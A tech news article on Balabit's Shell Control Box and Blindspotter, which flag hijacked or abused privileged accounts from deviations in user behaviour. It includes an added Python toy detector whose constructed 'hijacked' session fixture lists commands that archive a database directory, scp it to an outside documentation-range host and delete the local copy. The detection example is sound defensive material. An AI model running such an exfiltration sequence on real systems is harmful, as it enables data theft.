BUDAPEST—A consistent pattern turns up in the aftermath of many of today's data breaches and attempted network intrusions. It is the first phase of the attack, and few notice it, because it begins with a phishing email designed to harvest the login credentials of a privileged network user.
In many cases the attack then proceeds step by step. The first victim may be an employee whose access yields the information needed to obtain credentials with higher privileges, and the process repeats until the people behind the phishing campaign hold what they were really after: the credentials of someone with complete access to the network.
These initial attacks may proceed slowly so that the people behind them can make sure that they’re getting the access they want without being detected. In many cases, those hackers work for governments, but they may also work for organized criminals. Patiently, they wait until they have the keys they want, then they quietly strike.
In most networks, even those with excellent perimeter defenses and well-configured intrusion detection systems, the first stages are missed because they are so low-key: each step is small, slow, and carried out with valid credentials, so it looks like ordinary use of a legitimate account.
When they finally get the access they need, the hackers are careful so they don’t arouse suspicion. Eventually they are able to insert the malware or other means of getting the data that they want, at which point they can sit back and let it flow to them.
But if something interrupts these patient attempts to gain access, the whole attack plan may collapse, because once the security staff knows what is going on they can stop it. That is the role European network security newcomer Balabit aims to fill with a pair of products that work together to gather even the most subtle activity data and then analyze it for unexpected behavior.
The idea behind Balabit's Blindspotter and Shell Control Box is that if you gather enough data and compare expected activity with the actual activity on a live network, it becomes possible to tell whether someone who should not have a person's credentials is using them, or whether a privileged user is abusing their access rights.
The Balabit Shell Control Box is an appliance that sits inline as a proxy for user sessions and records what users do, privileged users included, down to every keystroke and mouse movement. Because administrators and other privileged users are the prime target for breaches, it can pay special attention to them.
The Blindspotter software sifts through the data collected by the Shell Control Box and looks for anything out of the ordinary. It can spot a user coming into the network from a strange IP address or at an unusual time of day, which other security software can also do, but it goes further: by modeling what each user normally does, it can flag not only unusual activity but also the absence of expected activity, in other words any deviation from that user's normal behavior.
For example, when a user who has been carrying out a specific set of tasks over time suddenly starts doing something else there’s cause for an alert.
Blindspotter Uses Machine Learning to Find Suspicious Network Activity
Likewise, if a user who has been doing administrative tasks starts sending large files to an outside IP address, that is another alert.
With the machine learning in Blindspotter, even seemingly minor things can raise the alarm. Suppose an administrator performs a series of tasks in the same order every day; that may well be normal. But suppose those tasks are carried out in exactly the same way at exactly the same second every day. That is something a person would not do, because people are never that precise, so it is again a reason to raise an alarm: the account is probably being driven by a script, not by its owner.
But it can go even deeper. It turns out that a person’s mouse and keyboard use have certain patterns and rhythms, which can be detected and analyzed by Blindspotter and stored by Shell Control Box. If someone suddenly exhibits a different manner of mouse or keyboard use, then it’s time to issue an alert to the security staff who may want to check the user out.
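The checks described above (an unfamiliar source address or hour, commands outside the user's usual repertoire, a large outbound transfer, a run of sessions too regular to be human, and a shift in typing rhythm) can all be expressed as comparisons against a per-user baseline. The script below is an added example written for this page; it is not Balabit code and makes no claim about how Blindspotter scores sessions. The session records, the field names, and every threshold in it are constructed assumptions, and the inter-keystroke intervals stand in for the far richer mouse and keyboard telemetry a real session-recording proxy would capture.

```python
"""Toy behavioural-baseline detector for privileged sessions (added example,
not Balabit code). All sessions below are constructed by hand; the field
names, thresholds and scoring are illustrative assumptions only."""
from datetime import datetime
from statistics import mean, pstdev


def session(start, src_ip, cmds, bytes_out, key_gaps):
    """One recorded session: ISO start time, source address, commands in the
    order typed, bytes sent to an outside address, and inter-keystroke
    intervals in seconds (a crude stand-in for typing rhythm)."""
    return {"start": start, "src_ip": src_ip, "cmds": cmds,
            "bytes_out": bytes_out, "key_gaps": key_gaps}


# Constructed baseline: five ordinary morning sessions for the admin "alice".
BASELINE = [
    session("2015-06-01T08:12:04", "10.1.5.20", ["sudo su -", "systemctl status nginx",
            "tail /var/log/nginx/error.log", "exit"], 0, [0.20, 0.22, 0.24, 0.20]),
    session("2015-06-02T08:31:40", "10.1.5.20", ["sudo su -", "systemctl restart nginx",
            "exit"], 0, [0.21, 0.25, 0.23, 0.23]),
    session("2015-06-03T08:05:12", "10.1.5.21", ["sudo su -", "df -h",
            "tail /var/log/nginx/error.log", "exit"], 0, [0.18, 0.22, 0.20, 0.20]),
    session("2015-06-04T08:44:59", "10.1.5.20", ["sudo su -", "systemctl status nginx",
            "exit"], 4096, [0.26, 0.24, 0.25, 0.23]),
    session("2015-06-05T08:19:33", "10.1.5.20", ["sudo su -", "df -h", "exit"],
            0, [0.19, 0.23, 0.21, 0.21]),
]
# Constructed new sessions: one normal, one that looks like a hijacked account
# (203.0.113.0/24 is a documentation range, not a real host).
NORMAL = session("2015-06-08T08:27:15", "10.1.5.21", ["sudo su -", "df -h", "exit"],
                 0, [0.22, 0.21, 0.23, 0.22])
HIJACKED = session("2015-06-09T02:30:07", "203.0.113.7",
                   ["sudo su -", "tar czf /tmp/db.tgz /var/lib/pgsql",
                    "scp /tmp/db.tgz backup@203.0.113.9:/", "rm /tmp/db.tgz"],
                   850_000_000, [0.06, 0.05, 0.07, 0.06])
# Five sessions that are each unremarkable alone but start at the same second
# every day and type the same commands: a script, not alice.
SCRIPTED = [session(f"2015-06-{d:02d}T08:15:00", "10.1.5.20",
                    ["sudo su -", "systemctl status nginx", "exit"], 0, [0.22] * 4)
            for d in range(8, 13)]


def build_profile(sessions):
    """Summarise what is 'normal' for one user from their past sessions."""
    gap_means = [mean(s["key_gaps"]) for s in sessions]
    return {
        "ips": {s["src_ip"] for s in sessions},
        "hours": {datetime.fromisoformat(s["start"]).hour for s in sessions},
        "vocab": {c for s in sessions for c in s["cmds"]},
        "max_out": max(s["bytes_out"] for s in sessions),
        "gap_mu": mean(gap_means),
        "gap_sd": max(pstdev(gap_means), 1e-3),  # floor avoids a zero divisor
    }


def session_alerts(s, profile, unseen_ratio=0.25, transfer_factor=10, z_limit=3.0):
    """Names of every deviation from the profile found in one session.
    The thresholds are illustrative assumptions, not tuned values."""
    alerts = []
    if s["src_ip"] not in profile["ips"]:
        alerts.append("new_source_ip")
    if datetime.fromisoformat(s["start"]).hour not in profile["hours"]:
        alerts.append("unusual_hour")
    unseen = [c for c in s["cmds"] if c not in profile["vocab"]]
    if s["cmds"] and len(unseen) / len(s["cmds"]) > unseen_ratio:
        alerts.append("unseen_commands")
    # Outbound volume far above anything seen before; a 1 MB absolute floor
    # keeps a near-zero baseline from turning every byte into an alert.
    if s["bytes_out"] > max(profile["max_out"] * transfer_factor, 1_000_000):
        alerts.append("large_external_transfer")
    z = (mean(s["key_gaps"]) - profile["gap_mu"]) / profile["gap_sd"]
    if abs(z) > z_limit:
        alerts.append("keystroke_rhythm_shift")
    return alerts


def _second_of_day(iso):
    t = datetime.fromisoformat(iso)
    return t.hour * 3600 + t.minute * 60 + t.second


def machine_like(sessions, max_jitter_s=2.0):
    """True when a run of sessions is too regular to be human: identical
    command sequences started within a couple of seconds of the same
    time of day. A person is never that exact."""
    if len(sessions) < 3:
        return False
    identical = len({tuple(s["cmds"]) for s in sessions}) == 1
    return identical and pstdev(_second_of_day(s["start"]) for s in sessions) < max_jitter_s


def run_demo():
    profile = build_profile(BASELINE)
    return {"normal": session_alerts(NORMAL, profile),
            "hijacked": session_alerts(HIJACKED, profile),
            "scripted_each": [session_alerts(s, profile) for s in SCRIPTED],
            "scripted_run": machine_like(SCRIPTED),
            "baseline_run": machine_like(BASELINE)}


if __name__ == "__main__":
    for name, result in run_demo().items():
        print(f"{name}: {result}")
```

The point the scripted run makes is the one the article makes: every one of those five sessions passes the per-session checks, and only looking at the run as a whole reveals that no person is typing. Two practical caveats apply to any such scheme. The baseline must be built from a period the attacker was not already present in, or their activity becomes "normal"; and the rhythm checks only work for interactive sessions that actually pass through the recording proxy, so anything that bypasses it is invisible to them.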
Sometimes, of course, the problem isn’t an unauthorized user, but rather a trusted user doing things they shouldn’t. Then, the keystrokes, mouse movements and data flow that caused suspicion can be played back, just as if they were recorded on tape, so that the security staff can see what a user who triggered an alert was actually up to. This is the way that you might detect a sales person downloading the company customer list before going to work for a competitor.
What's important is that with the machine learning in Blindspotter it becomes possible to detect the activities of fraudulent users after privileged accounts have been hijacked, or when privileged users take advantage of their position. This has been difficult or impossible to accomplish with earlier security products, leaving companies open to attacks through the very conduits they need in order to operate.
There is another capability that can help companies trying to stay free of breaches. Because the Shell Control Box sits inline as a proxy and router, it can block data from leaving the network through the sessions it mediates, effectively enforcing a default-deny policy on that traffic.
For most organizations, the ability to get an alert when something unexpected is going on, especially with privileged users, is a powerful security tool. Couple that with the ability to play back suspicious access sessions and it’s now possible to see when a privileged user is doing something wrong or when the user’s account has been taken over by an intruder.
Because extraneous information is filtered out, network managers gain the ability to spot the beginnings of a breach in its earliest stages and stop it in its tracks.
Detection at this stage might have blunted some of the most serious recent attacks, from the data breach at the Target retail chain to the one at the U.S. Office of Personnel Management. It is a capability that should exist in one form or another in every enterprise that may be attacked, which we can safely assume is all of them.